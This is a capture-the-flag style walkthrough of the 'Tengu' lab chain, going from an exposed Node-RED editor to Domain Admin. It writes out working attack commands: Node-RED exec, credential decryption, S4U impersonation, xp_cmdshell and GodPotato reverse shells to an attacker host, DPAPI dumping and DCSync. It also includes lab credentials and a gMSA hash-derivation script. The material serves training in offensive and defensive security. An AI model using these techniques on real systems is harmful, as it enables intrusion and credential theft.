# Tengu (Chain)

## Machine information

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2FUJmQg4xw6nWX6s9prDR2%2Fimage.png?alt=media&#x26;token=2aad5ba9-98ff-42d2-bb7d-ee66c9c65f27" alt=""><figcaption></figcaption></figure>

**Operating System:** Windows

**Chain:** True (3 Machines)

## Credentials

| Username           | Password                                   | Method                                    | Scope                              |
| ------------------ | ------------------------------------------ | ----------------------------------------- | ---------------------------------- |
| nodered\_connector | DreamPuppyOverall25                        | Decrypted from flows\_cred.json           | MSSQL                              |
| t2\_m.winters      | Tengu123                                   | Extracted from database                   | Domain User                        |
| NODERED$           | d4210ee2db0c03aa3611c9ef8a4dbf49 (NT hash) | Extracted from /etc/krb5.keytab as root   | Machine account                    |
| gMSA01$            | dc1d9dcba717b640f1d4ef66294b0790 (NT hash) | msDS-ManagedPassword read as NODERED$     | gMSA, can delegate to MSSQLSvc     |
| T0\_c.fowler       | UntrimmedDisplaceModify25                  | DPAPI machine credential on sql.tengu.vl  | Domain user with replication rights |
| Administrator      | 38c77bef855fd6896bc28c9429e18cfd (NT hash) | DCSync                                    | Domain Admin                       |

✅ Valid Usernames

```
nodered_connector
```

🔑 Passwords list

```
Tengu123
```

## Information Gathering

```sh
#10.10.229.53
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
#10.10.229.54
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
#10.10.229.55
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
1880/tcp open  vsat-control   # nmap's port-table guess; 1880 is the Node-RED editor and Admin API
```

## Service Enumeration

#### Discovering Node-RED

Node-RED is a flow-based programming tool built on Node.js for wiring together hardware devices, APIs and online services, widely used for IoT and industrial control systems. Its editor on port 1880 is also an HTTP Admin API, and the flows it deploys are executed by the Node-RED process itself: the built-in `exec` node runs arbitrary shell commands and the `function` node runs arbitrary JavaScript. When the editor is exposed without `adminAuth` configured in `settings.js`, anyone who can reach the port can deploy such a flow and execute commands as the user running Node-RED (`nodered_svc` on this host).

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2FWOmgdckFDgC98AULod6N%2Fimage.png?alt=media&#x26;token=2ad54539-abe8-4b29-8c60-c00e031db314" alt=""><figcaption></figcaption></figure>

## Compromise nodered server

### Initial Enumeration

The tester compromised the server by deploying the following flow through the Node-RED editor on port 1880:

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2FBDzulIUqcbkSzNV7PPO8%2Fimage.png?alt=media&#x26;token=546fd251-0a47-4c6e-a66f-445a346a1c1a" alt=""><figcaption></figcaption></figure>

1. `inject` node: triggers the flow (the button in the editor, or automatically on deploy when it is configured to inject once)
2. `exec` node: its **Command** field holds the shell command to run; it executes as the `nodered_svc` user
3. `debug` node: shows the command's output in the editor sidebar

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2Fmx4f8wndZGgIatOPczlD%2Fimage.png?alt=media&#x26;token=8e7a15cd-7889-46e3-962f-238acc711f6b" alt=""><figcaption></figcaption></figure>

### Lateral movement to t2\_m.winters

#### Decrypting credentials

Node-RED keeps the credentials configured in nodes (here the MSSQL node's login) in `flows_cred.json`, encrypted with AES-256-CTR under a key derived from `credentialSecret` in `settings.js` or, when that is unset, from the auto-generated `_credentialSecret` stored in `.config.runtime.json` in the same directory. Anyone who can read both files can recover every stored credential. During enumeration the tester found the following article, [how-to-decrypt-flows\_cred-json-from-nodered-data](https://blog.hugopoi.net/en/2021/12/28/how-to-decrypt-flows_cred-json-from-nodered-data/), and used its script to decrypt the `flows_cred.json` file.

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2FgaH82JuFZK7Jqz5ZfMQR%2Fimage.png?alt=media&#x26;token=aead2bc0-92ed-44c5-b05e-30adf16a04e5" alt=""><figcaption></figcaption></figure>

```sh
nodered_svc@nodered:~/.node-red$ find / -name "flows_cred.json" 2>/dev/null
/opt/nodered/.node-red/flows_cred.json
/home/nodered_svc/.node-red/flows_cred.json
```

```sh
❯ ./decrypt.sh .node-red | xargs echo   # xargs echo strips the quotes from the decrypted JSON
{d237b4c16a396b9e:{username:nodered_connector,password:DreamPuppyOverall25}}
```

The key is the id of the node that owns the credentials; the value is the MSSQL login the flow uses.

#### Setting up tunneling

The MSSQL service on `sql.tengu.vl` is not reachable from the attacker's network, so the tester tunneled through the compromised Node-RED host; the commands that follow are run through `proxychains` over that tunnel.

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2Fjkc52aytJ6gK7wWzpvL8%2Fimage.png?alt=media&#x26;token=fa70fb71-2a13-40da-8a99-7005d1619213" alt=""><figcaption></figcaption></figure>

#### Extracting user credentials from the database

Connecting to MSSQL with Impacket's `mssqlclient` and the decrypted `nodered_connector` credentials:

```sh
❯ proxychains impacket-mssqlclient sql.tengu.vl/nodered_connector:'DreamPuppyOverall25'@10.10.148.22 2>/dev/null
```

```sh
SQL (nodered_connector  nodered_connector@Demo)> SELECT * FROM Demo.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
Demo            dbo            Users        b'BASE TABLE'   

SQL (nodered_connector  nodered_connector@Demo)> select * from Users;
  ID   Username          Password                                                              
----   ---------------   -------------------------------------------------------------------   
NULL   b't2_m.winters'   b'af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147'   

SQL (nodered_connector  nodered_connector@Demo)> 
```

The `Password` column holds a 64-character hex value, the format of an unsalted SHA-256 digest (hashcat mode 1400); it corresponds to the plaintext `Tengu123` listed in the credentials table, which turned out to be a domain password.

### Privilege Escalation to root

The Node-RED host is joined to `tengu.vl`: the domain password recovered from the database is accepted by `su` for the principal `t2_m.winters@tengu.vl`, and `sudo -l` shows that the account may run anything as root.

```sh
nodered_svc@nodered:/opt/nodered$ su t2_m.winters@tengu.vl
Password: 

t2_m.winters@tengu.vl@nodered:/opt/nodered$ sudo -l
[sudo] password for t2_m.winters@tengu.vl: 
Matching Defaults entries for t2_m.winters@tengu.vl on nodered:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User t2_m.winters@tengu.vl may run the following commands on nodered:
    (ALL : ALL) ALL

t2_m.winters@tengu.vl@nodered:/opt/nodered$ sudo su
root@nodered:/opt/nodered# 
```

#### Extracting the NODERED$ machine account NT hash

A domain-joined Linux host stores its machine account's Kerberos keys in `/etc/krb5.keytab`, readable only by root. The RC4-HMAC key (etype 23) in a keytab is the account's NT hash itself, so once root the tester pulled it with `keytabextract.py` and could authenticate to the domain as `NODERED$`.

```sh
root@nodered:~# python3 keytabextract.py /etc/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
	REALM : TENGU.VL
	SERVICE PRINCIPAL : NODERED$/
	NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
	AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
	AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
root@nodered:~# 
```

## Compromising SQL machine

### Initial Foothold

With the `NODERED$` hash the tester queried the domain controller for group managed service account passwords. `msDS-ManagedPassword` is returned over LDAPS only to the principals listed in the gMSA's `msDS-GroupMSAMembership` (PrincipalsAllowedToRetrieveManagedPassword); `NODERED$` is allowed to read `gMSA01$`, and both tools derive the NT hash from the returned password blob.

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2FIxCXWTQt6aoBCMAsdeJE%2Fimage.png?alt=media&#x26;token=fbae5f05-4dd3-489f-85fe-c1ab4cc9f3ea" alt=""><figcaption></figcaption></figure>

```sh
#Using NetExec
❯ proxychains nxc ldap 10.10.148.21 -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa 2>/dev/null
SMB         10.10.148.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
LDAPS       10.10.148.21    636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 
LDAPS       10.10.148.21    636    DC               [*] Getting GMSA Passwords
LDAPS       10.10.148.21    636    DC               Account: gMSA01$              NTLM: dc1d9dcba717b640f1d4ef66294b0790
LDAPS       10.10.148.21    636    DC               Account: gMSA02$              NTLM: 
# empty NTLM: the attribute was not returned, so NODERED$ is not permitted to read gMSA02$'s password

#Using bloodyAD 
❯ proxychains bloodyAD --host dc.tengu.vl -d tengu.vl -u 'NODERED$' -p :d4210ee2db0c03aa3611c9ef8a4dbf49 get object 'gMSA01$' --attr msDS-ManagedPassword 2>/dev/null

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=tengu,DC=vl
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:dc1d9dcba717b640f1d4ef66294b0790
msDS-ManagedPassword.B64ENCODED: Xa2PeJhpM9WJnpyqIoXMnx5z+2N57I+9lVX8fQA7o0KJUMPmFPGwLs1VGB++HezeVyyc6Eb5WVZOiZ0oCrRy5dlwmrF9lHlcV6nwZcABJhfBUsjBK8WL2/kxHoCC5SJXdykYPbmF+ESpaY68tYteAzqGgrDri4ghAjVIt35xZPKXfvxLtpkp8LbLsj9+siTwKeQ/7vjPOQZ76NJgN1oSAq4Kv6tNNVCaF2MoVTcBi/1djo/J9+b66g6uCg/WdsOQgEBNcJnX4yIU1qbh0EOhN6bpA6VXHW25/ppNkTnXiBteFKdOl+9bxUFcOIre8cFGHd/XtSZTa5GwUiO8kMcFcw==
```
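What `--gmsa` does after the LDAP read, as an added example that is not nxc's or bloodyAD's code: parse the `MSDS-MANAGEDPASSWORD_BLOB` and take MD4 over the current password's UTF-16LE bytes, which is the NT hash. MD4 is implemented inline because Node builds on OpenSSL 3 reject `createHash('md4')`. The sample blob is constructed from the password `password`; feeding bloodyAD's `B64ENCODED` value to `ntHash()` assumes that field holds the raw current-password bytes:

```javascript
// Added example, not code from nxc or bloodyAD: derive a gMSA's NT hash from the raw
// msDS-ManagedPassword value (MS-ADTS 2.2.20 MSDS-MANAGEDPASSWORD_BLOB).
// NT hash = MD4(UTF-16LE password); MD4 is written out because OpenSSL 3 builds of Node
// throw on crypto.createHash('md4'). The sample blob below is constructed, not Tengu's.

function md4(msg) {
  const rotl = (x, s) => ((x << s) | (x >>> (32 - s))) >>> 0;
  const F = (x, y, z) => (x & y) | (~x & z);
  const G = (x, y, z) => (x & y) | (x & z) | (y & z);
  const H = (x, y, z) => x ^ y ^ z;
  const R2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15];
  const R3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15];
  const S1 = [3, 7, 11, 19], S2 = [3, 5, 9, 13], S3 = [3, 9, 11, 15];
  // padding: 0x80, zeros, then the 64-bit little-endian bit length
  const total = Math.ceil((msg.length + 9) / 64) * 64;
  const p = Buffer.alloc(total);
  msg.copy(p);
  p[msg.length] = 0x80;
  p.writeUInt32LE((msg.length * 8) >>> 0, total - 8);
  p.writeUInt32LE(Math.floor(msg.length / 0x20000000), total - 4);
  let [a0, b0, c0, d0] = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476];
  for (let off = 0; off < total; off += 64) {
    const X = Array.from({ length: 16 }, (_, i) => p.readUInt32LE(off + 4 * i));
    let a = a0, b = b0, c = c0, d = d0, t;
    for (let i = 0; i < 16; i++) { t = rotl((a + F(b, c, d) + X[i]) >>> 0, S1[i % 4]); a = d; d = c; c = b; b = t; }
    for (let i = 0; i < 16; i++) { t = rotl((a + G(b, c, d) + X[R2[i]] + 0x5a827999) >>> 0, S2[i % 4]); a = d; d = c; c = b; b = t; }
    for (let i = 0; i < 16; i++) { t = rotl((a + H(b, c, d) + X[R3[i]] + 0x6ed9eba1) >>> 0, S3[i % 4]); a = d; d = c; c = b; b = t; }
    a0 = (a0 + a) >>> 0; b0 = (b0 + b) >>> 0; c0 = (c0 + c) >>> 0; d0 = (d0 + d) >>> 0;
  }
  const out = Buffer.alloc(16);
  [a0, b0, c0, d0].forEach((w, i) => out.writeUInt32LE(w, 4 * i));
  return out.toString('hex');
}

// Blob layout: Version(2) Reserved(2) Length(4) CurrentPasswordOffset(2)
// PreviousPasswordOffset(2) QueryPasswordIntervalOffset(2) UnchangedPasswordIntervalOffset(2),
// then null-terminated UTF-16LE passwords and two 64-bit intervals in 100 ns units.
function parseManagedPasswordBlob(blob) {
  if (blob.readUInt16LE(0) !== 1) throw new Error('unexpected MSDS-MANAGEDPASSWORD_BLOB version');
  const curOff = blob.readUInt16LE(8), prevOff = blob.readUInt16LE(10);
  const queryOff = blob.readUInt16LE(12), unchangedOff = blob.readUInt16LE(14);
  // A password field ends where the next field starts; drop the 2-byte terminator. Using
  // the offsets avoids scanning for a zero code unit inside the random password bytes.
  return {
    currentPassword: blob.subarray(curOff, (prevOff || queryOff) - 2),
    previousPassword: prevOff ? blob.subarray(prevOff, queryOff - 2) : null,
    queryPasswordInterval: blob.readBigUInt64LE(queryOff),
    unchangedPasswordInterval: blob.readBigUInt64LE(unchangedOff),
  };
}

const ntHash = pwBytes => md4(pwBytes);          // pwBytes: UTF-16LE password, no terminator
const ntHashFromBlob = blob => ntHash(parseManagedPasswordBlob(blob).currentPassword);

// Constructed sample blob (no previous password) for a given password string.
function buildBlob(password) {
  const pw = Buffer.concat([Buffer.from(password, 'utf16le'), Buffer.alloc(2)]);
  const hdr = Buffer.alloc(16);
  hdr.writeUInt16LE(1, 0);                      // Version
  hdr.writeUInt16LE(16, 8);                     // CurrentPasswordOffset
  hdr.writeUInt16LE(0, 10);                     // PreviousPasswordOffset: none
  hdr.writeUInt16LE(16 + pw.length, 12);        // QueryPasswordIntervalOffset
  hdr.writeUInt16LE(16 + pw.length + 8, 14);    // UnchangedPasswordIntervalOffset
  const intervals = Buffer.alloc(16);
  intervals.writeBigUInt64LE(86400n * 10000000n, 0);   // 1 day until the next rotation query
  const blob = Buffer.concat([hdr, pw, intervals]);
  blob.writeUInt32LE(blob.length, 4);           // Length of the whole structure
  return blob;
}

// Usage: node gmsa_nthash.js <base64>   (a raw attribute value, or password bytes such as
// bloodyAD's B64ENCODED field, assumed here to be the raw current-password bytes)
if (process.argv[2]) {
  const data = Buffer.from(process.argv[2], 'base64');
  const looksLikeBlob = data.length > 16 && data.readUInt16LE(0) === 1 && data.readUInt16LE(8) === 16;
  console.log(looksLikeBlob ? ntHashFromBlob(data) : ntHash(data));
} else {
  console.log('NT hash of the sample gMSA password "password":', ntHashFromBlob(buildBlob('password')));
}
```

Real gMSA passwords are 256 bytes of random UTF-16LE, so the value is only useful as a hash or an AES key, never as something to type; the `QueryPasswordInterval` tells you how long that hash stays valid before the KDS rotates it.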

#### Impersonating a user account

After compromising the `gMSA01$` account, the tester enumerated the `Protected Users` group and found that both `Administrator` and `TX_C.FOWLER` belong to it. `gMSA01$` is allowed to delegate to the `MSSQLSvc/sql.tengu.vl` service, but members of Protected Users cannot be delegated, so S4U2self/S4U2proxy cannot produce a service ticket in their name.

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2Fb2gBRwD8kPfzdw9C5wsc%2Fimage.png?alt=media&#x26;token=60138468-caf6-4797-9ab1-39f6e27cf87d" alt=""><figcaption></figcaption></figure>

The user `T1_M.WINTERS`, however, is not in `Protected Users` and is a member of `SQL_ADMINS`, so the tester requested a ticket for the SQL service in that user's name instead.

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2Fe1MSTT57ubLPdYjMzADo%2Fimage.png?alt=media&#x26;token=b9336c36-bf98-41f1-9670-318ce7a4d303" alt=""><figcaption></figcaption></figure>

```sh
❯ proxychains impacket-getST -spn 'MSSQLSvc/sql.tengu.vl:1433' -impersonate 't1_M.WINTERS' -hashes :dc1d9dcba717b640f1d4ef66294b0790 'tengu.vl/gMSA01$' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating t1_M.WINTERS
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in t1_M.WINTERS@MSSQLSvc_sql.tengu.vl:1433@TENGU.VL.ccache
❯ export KRB5CCNAME='t1_M.WINTERS@MSSQLSvc_sql.tengu.vl:1433@TENGU.VL.ccache'
```

#### Connecting and enabling xp\_cmdshell

```sh
❯ proxychains impacket-mssqlclient -k -no-pass sql.tengu.vl
SQL (TENGU\t1_m.winters  dbo@master)> enable_xp_cmdshell
INFO(SQL): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(SQL): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
```

Both options report `changed from 1 to 1`: `xp_cmdshell` was already enabled on the instance. `enable_xp_cmdshell` is the mssqlclient shortcut for `sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE`, which requires `sysadmin` (or `ALTER SETTINGS`); together with the `dbo@master` prompt this shows that `SQL_ADMINS` maps to instance-level admin.

#### Gaining a shell on sql.tengu.vl using hoaxshell

**Tool:** [hoaxshell](https://github.com/t3l3machus/hoaxshell)

The hoaxshell PowerShell payload was launched through `xp_cmdshell`. For a `sysadmin` caller `xp_cmdshell` runs under the SQL Server service account, which is the context of the shell below.

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2FRk5hHD6KyNyRKAU9alTP%2Fimage.png?alt=media&#x26;token=2eddc70c-fe3b-4e65-9ef0-7e1b2caa3ead" alt=""><figcaption></figcaption></figure>

### Privilege Escalation to NT Authority System

#### Abusing SeImpersonatePrivilege

The SQL Server service account holds `SeImpersonatePrivilege`, which the Potato family of tools turns into code execution as `NT AUTHORITY\SYSTEM`. The tester hosted [GodPotato-NET4.exe](https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe) on an SMB share on the attacking machine and ran it from the hoaxshell session with a base64-encoded (UTF-16LE, `-e`) PowerShell reverse shell back to 10.8.5.48:4444:

```sh
PS C:\Windows\system32 > \\10.8.5.48\smbfolder\GodPotato-NET4.exe -Cmd 'cmd /c powershell -e <base64>'
```

<figure><img src="https://1130760026-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9bhzgei4vAhFLAb3PDZF%2Fuploads%2FbWdCUSnKS9oKB7DyPMoq%2Fimage.png?alt=media&#x26;token=036fd486-d068-4171-8d48-9025d0c49936" alt=""><figcaption></figcaption></figure>

**Listing Stored Credentials**

`cmdkey /list` run as SYSTEM shows a credential saved by the Task Scheduler for a task that runs as `TENGU\T0_c.fowler`. Such entries live in the SYSTEM profile's DPAPI credential store, so they can only be decrypted with the machine's DPAPI keys, which SYSTEM has access to.

```
PS C:\> cmdkey /list

Currently stored credentials:

    Target: Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    Type: Domain Password
    User: TENGU\T0_c.fowler
    Local machine persistence
    
PS C:\> 
```

## Compromising Tengu.vl Domain Controller

#### Dumping DPAPI credentials

**Tool:** [SharpDPAPI.exe](https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpDPAPI.exe)

`SharpDPAPI machinecredentials`, run as SYSTEM, reads the `DPAPI_SYSTEM` LSA secret, uses it to decrypt the machine master keys and then decrypts every credential file under the system profile, revealing the scheduled task's stored password.

```sh
PS C:\Temp> .\SharpDPAPI.exe machinecredentials

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.11.3                               

Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 67B6C9FA0475C51A637428875C335AAD

    guidMasterKey    : {1415bc56-749a-4f03-8a8e-9fb9733359ab}
    size             : 576
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 3/10/2024 2:49:34 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    TargetAlias      : 
    Comment          : 
    UserName         : TENGU\T0_c.fowler
    Credential       : UntrimmedDisplaceModify25

PS C:\Temp> 
```

#### Bypassing STATUS\_ACCOUNT\_RESTRICTION

NTLM authentication as `T0_c.fowler` is refused with `STATUS_ACCOUNT_RESTRICTION`, the error returned for members of `Protected Users`, whose accounts cannot authenticate with NTLM. The password is still valid: Kerberos authentication (`-k`) with the same credentials succeeds.

```sh
❯ proxychains nxc smb 10.10.148.21 -u 'T0_c.fowler' -p 'UntrimmedDisplaceModify25' 2>/dev/null
SMB         10.10.148.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
SMB         10.10.148.21    445    DC               [-] tengu.vl\T0_c.fowler:UntrimmedDisplaceModify25 STATUS_ACCOUNT_RESTRICTION 
❯ proxychains nxc smb 10.10.148.21 -u 'T0_c.fowler' -p 'UntrimmedDisplaceModify25' -k 2>/dev/null
SMB         10.10.148.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
SMB         10.10.148.21    445    DC               [+] tengu.vl\T0_c.fowler:UntrimmedDisplaceModify25 (Pwn3d!)
```

#### Requesting a Kerberos TGT as T0\_c.fowler

```sh
❯ proxychains impacket-getTGT tengu.vl/'T0_c.fowler':'UntrimmedDisplaceModify25' -k 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in T0_c.fowler.ccache
❯ export KRB5CCNAME='T0_c.fowler.ccache'
```

#### Performing a DCSync attack over Kerberos

The `T0_c.fowler` account holds domain replication rights, so `secretsdump` can pull the Administrator's secrets through DRSUAPI; authenticating with the TGT just obtained (`-k -no-pass`) avoids NTLM, which this account cannot use.

```sh
❯ proxychains impacket-secretsdump -k -no-pass dc.tengu.vl -just-dc-user Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38c77bef855fd6896bc28c9429e18cfd:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2962482a8268521e3a583150d79b51474b07a0d237216b7c15da26b4cb0d3807
Administrator:aes128-cts-hmac-sha1-96:360c06cc8bed5a43e08afe83c3797b2a
Administrator:des-cbc-md5:3e5816ceea8feaa4
```

#### Requesting a TGT as Administrator on dc.tengu.vl

```sh
❯ proxychains impacket-getTGT tengu.vl/Administrator -hashes :38c77bef855fd6896bc28c9429e18cfd 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Administrator.ccache
❯ export KRB5CCNAME='Administrator.ccache'
```

#### Gaining a shell as Administrator on dc.tengu.vl

```sh
❯ proxychains impacket-wmiexec -k -no-pass dc.tengu.vl 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
tengu\administrator

C:\>
```
